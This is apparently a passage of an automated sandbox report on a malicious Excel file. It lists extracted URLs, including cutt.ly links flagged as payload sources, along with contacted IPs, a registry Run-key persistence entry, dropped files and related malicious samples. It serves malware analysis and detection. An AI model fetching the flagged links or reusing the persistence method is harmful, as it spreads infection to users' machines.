                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2134654234.000000000024E000.00000004.00000020.sdmpfalse
                                        		high
                                        http://www.e-szigno.hu/RootCA.crlpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.signatur.rtr.at/current.crl0powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.sk.ee/juur/crl/0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://crl.chambersign.org/chambersignroot.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://crl.xrampsecurity.com/XGCA.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.quovadis.bm0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://crl.ssc.lt/root-a/cacrl.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.trustdst.com/certificates/policy/ACES-index.html0powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.firmaprofesional.com0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://cutt.ly/powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.netlock.net/docspowershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlpowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://crl.entrust.net/2048ca.crl0powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmpfalse
                                                		high
                                                http://cps.chambersign.org/cps/publicnotaryroot.html0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.e-trust.be/CPS/QNcertspowershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.certicamara.com/certicamaraca.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://fedir.comsign.co.il/crl/ComSignCA.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://ocsp.entrust.net03powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.ibsensoftware.com/RegAsm.exefalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://cps.chambersign.org/cps/chambersroot.html0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.acabogacia.org0powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://cutt.lypowershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ca.sia.it/seccli/repository/CPS0powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://crl.securetrust.com/SGCA.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://crl.securetrust.com/STCA.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://cutt.ly/qjdJoz4PEpowershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.icra.org/vocabulary/.powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.certicamara.com/certicamaraca.crl0;powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.e-szigno.hu/RootCA.crt0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.quovadisglobal.com/cps0powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0Lpowershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://investor.msn.com/powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.valicert.com/1powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.e-szigno.hu/SZSZ/0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.%s.comPApowershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		low
                                                                http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://ocsp.quovadisoffshore.com0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://ocsp.entrust.net0Dpowershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://cps.chambersign.org/cps/chambersignroot.html0powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://cutt.ly/qjdJoz4powershell.exe, 00000006.00000002.2098023844.00000000001D0000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2099196904.0000000002BD1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2099216608.0000000002BFF000.00000004.00000001.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://ca.sia.it/secsrv/repository/CRL.der0Jpowershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                83.172.144.37
                                                                		unknownNetherlands
                                                                		25459NEDZONE-ASNLtrue
                                                                104.22.0.232
                                                                		unknownUnited States
                                                                		13335CLOUDFLARENETUStrue
                                                                185.206.215.56
                                                                		unknownUkraine
                                                                		204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLtrue

                                                                General Information

                                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                                Analysis ID:336301
                                                                Start date:05.01.2021
                                                                Start time:19:04:25
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 10m 12s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:light
                                                                Sample file name:6Cprm97UTl (renamed file extension from none to xls)
                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                Number of analysed new started processes analysed:21
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.spyw.expl.evad.winXLS@27/18@2/3
                                                                EGA Information:
                                                                • Successful, ratio: 71.4%
                                                                HDC Information:
                                                                • Successful, ratio: 31.4% (good quality ratio 30.5%)
                                                                • Quality average: 78.2%
                                                                • Quality standard deviation: 27.4%
                                                                HCA Information:
                                                                • Successful, ratio: 99%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Changed system and user locale, location and keyboard layout to English - United States
                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                • Attach to Office via COM
                                                                • Scroll down
                                                                • Close Viewer
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                                • HTTP Packets have been reduced
                                                                • TCP Packets have been reduced to 100
                                                                • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209
                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
                                                                • Execution Graph export aborted for target RegAsm.exe, PID 2844 because there are no executed function
                                                                • Execution Graph export aborted for target powershell.exe, PID 1324 because it is empty
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/336301/sample/6Cprm97UTl.xls

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                19:04:41API Interceptor449x Sleep call for process: powershell.exe modified
                                                                19:05:09API Interceptor122x Sleep call for process: 12.exe modified
                                                                19:05:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jfdts C:\Users\user\ntrwe.exe
                                                                19:05:22API Interceptor98x Sleep call for process: ntrwe.exe modified
                                                                19:05:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jfdts C:\Users\user\ntrwe.exe
                                                                19:05:29API Interceptor779x Sleep call for process: RegAsm.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                104.22.0.232sample products trade reference.docxGet hashmaliciousBrowse
                                                                • cutt.ly/
                                                                Request_for_Quotation.xlsmGet hashmaliciousBrowse
                                                                • cutt.ly/gdvAeui

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                cutt.lyspetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                AdviceSlip.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                file.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                SecuriteInfo.com.Heur.20246.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                30689741.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                95773220855.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232
                                                                95773220855.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                MT-000137.xlsGet hashmaliciousBrowse
                                                                • 172.67.8.238
                                                                95773220855.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                MT-000137.xlsGet hashmaliciousBrowse
                                                                • 104.22.1.232

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                NEDZONE-ASNLhttps://balenpersen.com/TO/financialcrimes@lvmpd.comGet hashmaliciousBrowse
                                                                • 83.172.131.9
                                                                SecuriteInfo.com.Trojan.GenericKD.34438057.21356.docGet hashmaliciousBrowse
                                                                • 83.172.180.164
                                                                https://installatiebedrijfroosendaal.nl/ONWFP-gO_YnJ-5Yu/ACH/PaymentAdvice/En_us/Sales-InvoiceGet hashmaliciousBrowse
                                                                • 83.172.144.29
                                                                CLOUDFLARENETUSAudio_47720.wavv - - Copy.htmGet hashmaliciousBrowse
                                                                • 104.16.19.94
                                                                Adjunto.docGet hashmaliciousBrowse
                                                                • 104.27.144.251
                                                                details.htmlGet hashmaliciousBrowse
                                                                • 104.16.126.175
                                                                https://notification1.bubbleapps.io/version-test?debug_mode=trueGet hashmaliciousBrowse
                                                                • 104.19.241.93
                                                                NQN0244_012021.docGet hashmaliciousBrowse
                                                                • 104.27.144.251
                                                                sek750_2021.exeGet hashmaliciousBrowse
                                                                • 172.67.166.210
                                                                4560 2021 UE_9893.docGet hashmaliciousBrowse
                                                                • 104.18.61.59
                                                                Stremio+4.4.120.exeGet hashmaliciousBrowse
                                                                • 104.16.135.12
                                                                https://bitly.com/2XaL0DpGet hashmaliciousBrowse
                                                                • 104.27.183.152
                                                                lJV2MfkPFd.exeGet hashmaliciousBrowse
                                                                • 104.27.151.210
                                                                DAT 2020_12_30.docGet hashmaliciousBrowse
                                                                • 172.67.191.146
                                                                https://f000.backblazeb2.com/file/url-data-web-storage-secured-56adbcsjhdcbjs/web-data-server-1uyhchduiahc/index.htmlGet hashmaliciousBrowse
                                                                • 104.18.55.96
                                                                G6slMyq847.exeGet hashmaliciousBrowse
                                                                • 104.27.151.210
                                                                https://f000.backblazeb2.com/file/url-data-web-storage-secured-56adbcsjhdcbjs/web-data-server-1uyhchduiahc/index.htmlGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                Scan-0767672.docGet hashmaliciousBrowse
                                                                • 104.27.144.251
                                                                http://quickneasyrecipes.coGet hashmaliciousBrowse
                                                                • 104.18.226.52
                                                                Documento-2021.docGet hashmaliciousBrowse
                                                                • 172.67.141.14
                                                                #Ud83d#Udcdejsi12615.htmlGet hashmaliciousBrowse
                                                                • 104.16.18.94
                                                                https://splendideventsllc.org/Banco/Get hashmaliciousBrowse
                                                                • 104.18.82.87
                                                                https://splendideventsllc.org/Banco/Get hashmaliciousBrowse
                                                                • 104.18.207.19
                                                                ON-LINE-DATAServerlocation-NetherlandsDrontenNLhttp://d4a687ce4c.lazeruka.ruGet hashmaliciousBrowse
                                                                • 91.211.251.72
                                                                New order.docGet hashmaliciousBrowse
                                                                • 92.119.113.115
                                                                Purchase order.docGet hashmaliciousBrowse
                                                                • 92.119.113.115
                                                                PO20-AE12-0023.docGet hashmaliciousBrowse
                                                                • 92.119.113.140
                                                                ES-MA-18-9 4130.docGet hashmaliciousBrowse
                                                                • 92.119.113.140
                                                                Order-list.docGet hashmaliciousBrowse
                                                                • 92.119.113.140
                                                                Launcher.exeGet hashmaliciousBrowse
                                                                • 185.92.148.230
                                                                UXsGbxVc2I.rtfGet hashmaliciousBrowse
                                                                • 92.119.113.115
                                                                Documents.docGet hashmaliciousBrowse
                                                                • 92.119.113.115
                                                                http://clcktut.work/public/8852102841203823Get hashmaliciousBrowse
                                                                • 45.82.69.137
                                                                Vlpuoe2JSz.exeGet hashmaliciousBrowse
                                                                • 45.147.197.185
                                                                PI.xlsxGet hashmaliciousBrowse
                                                                • 45.147.197.185
                                                                PO#181120_pdf.exeGet hashmaliciousBrowse
                                                                • 92.119.113.115
                                                                http://sh1563741.a.had.su/Area-Cliente/informazioni/web/Get hashmaliciousBrowse
                                                                • 45.147.197.180
                                                                u4WV77ddWF.dllGet hashmaliciousBrowse
                                                                • 185.219.83.48
                                                                k1mh5904.exeGet hashmaliciousBrowse
                                                                • 95.215.206.139
                                                                VVV.exeGet hashmaliciousBrowse
                                                                • 178.159.43.35
                                                                Internet download manager cracker (1).exeGet hashmaliciousBrowse
                                                                • 45.147.197.110
                                                                http://www.google.com/url?q=http%3A%2F%2Fjonfriskics.com%2Flotterye&sa=D&sntz=1&usg=AFQjCNFU254PyrxnCIpYtaqc4jMuBkMlpgGet hashmaliciousBrowse
                                                                • 45.147.197.36
                                                                http://prevuse.ruGet hashmaliciousBrowse
                                                                • 45.147.197.20

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                05af1f5ca1b87cc9cc9b25185115607dDAT 2020_12_30.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                PSX7103491.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                Beauftragung.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                1I72L29IL3F.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                Adjunto_2021.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                Dok 0501 012021 Q_93291.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                invoice.docGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                output.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                Shipping Details DHL.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                AdviceSlip.xlsGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                PI 99-14.doc__.rtfGet hashmaliciousBrowse
                                                                • 104.22.0.232
                                                                Archivo.docGet hashmaliciousBrowse
                                                                • 104.22.0.232

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                C:\Users\user\AppData\Local\Temp\RegAsm.exePayment_Confirmation_Slip.xlsxGet hashmaliciousBrowse
                                                                  Overdue Invoice.xlsxGet hashmaliciousBrowse
                                                                    Quotation.xlsxGet hashmaliciousBrowse
                                                                      ENCLOSE ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                        PO INV 195167 & 195324.xlsxGet hashmaliciousBrowse
                                                                          Bank letter.xlsxGet hashmaliciousBrowse
                                                                            Quotation.xlsxGet hashmaliciousBrowse
                                                                              PO 19030004.xlsxGet hashmaliciousBrowse
                                                                                New PO PO20.xlsxGet hashmaliciousBrowse
                                                                                  ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                    RFQ 00112.xlsxGet hashmaliciousBrowse
                                                                                      inquiry.xlsxGet hashmaliciousBrowse

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                        Category:dropped
                                                                                        Size (bytes):58936
                                                                                        Entropy (8bit):7.994797855729196
                                                                                        Encrypted:true
                                                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):326
                                                                                        Entropy (8bit):3.1086014193077407
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:kKlawwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:N1kPlE99SNxAhUegeT2
                                                                                        MD5:89A188366EFFB46949AD9093EDA55CF1
                                                                                        SHA1:6F3931CD5BA324C598AE0B45F7A1EA387E7DD1F2
                                                                                        SHA-256:9FBCA6A1EEDBC56E0350C4D21F36077F429AE6452F579A3864D44D11AD49A909
                                                                                        SHA-512:F964D8C36C44119D49191DD1CD2D990D8EE87FC5EEDB9042CD8839100CCDA240ECC054FE1172A8E487569D4EFC5DDE439A2234E992DB0373AE34AD88FE98411E
                                                                                        Malicious:false
                                                                                        Preview: p...... .........:.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                                        C:\Users\user\AppData\Local\Temp\05DE0000
                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):105034
                                                                                        Entropy (8bit):7.925151112906241
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:nda1iLoxgaSNUPZlsaFPOHYiR+rJEgjjajH7cA:nGiE/SN0ZltFPgY9rvgp
                                                                                        MD5:2A97A372C7AC14DDAF2BC6CECA6BCDE8
                                                                                        SHA1:6509EB9A038444C7CD44BF03B7B6536CCEBB73F0
                                                                                        SHA-256:DBC762A96077FDB3858F84F2642813C5CAA88A1B41FFEB34C1FD5BAB9F6F2D9D
                                                                                        SHA-512:0EC40FBAB270674794C191A66EAC1FD609D9D264EE7A835B34F61A63ABA2687E2E8B83B23FD83C409050C6072473F7AFEC4FB521CD327D2F00DD9A42531B3A45
                                                                                        Malicious:false
                                                                                        Preview: ...N.0...H.C.+J\8 ..r.e......=M...<..g...U...DI..~..xfz...x....]V.V..^i.....Oy..L.)a.........l.....U;.Y.R...e.V`..8ZY.hE.... .R4..&.k..K.R....M..B..T.....\;V..|.Q5.!.-E"....H...-Ay.jI...A(l..5U.....R..!.{..5;Lm...~.E..;%#6..*....xAa. ..9.u....VP<....Ki...>.../.a.....V.L.%VY!..wbn..v......R..n/O../..\.XO;...L.......D..xw=f...:.. ...<".a......[.A=%j.....=.CE.-....s..4U...H.+.....|....AL..]....D.'..wf!.@.a.n..>.......PK..........!....-............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        C:\Users\user\AppData\Local\Temp\Cab8018.tmp
